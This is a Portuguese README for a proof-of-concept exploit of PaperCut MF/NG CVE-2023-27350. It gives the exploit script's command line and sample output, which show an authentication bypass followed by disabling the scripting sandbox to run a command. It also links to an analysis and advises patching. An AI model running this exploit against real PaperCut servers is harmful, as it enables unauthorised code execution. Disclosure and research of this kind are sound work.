
Exploit de Prova de Conceito para PaperCut CVE-2023-27350
POC para CVE-2023-27350 afetando PaperCut MF/NG
Uma análise técnica de causa raiz da vulnerabilidade, indicadores de comprometimento e exposição na internet pode ser encontrada em nosso blog: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
Este POC utiliza uma vulnerabilidade de bypass de autenticação encadeada com o abuso da funcionalidade de script embutida para executar código.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Atualize para a versão mais recente ou mitigue seguindo as instruções do PaperCut Security Advisory
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.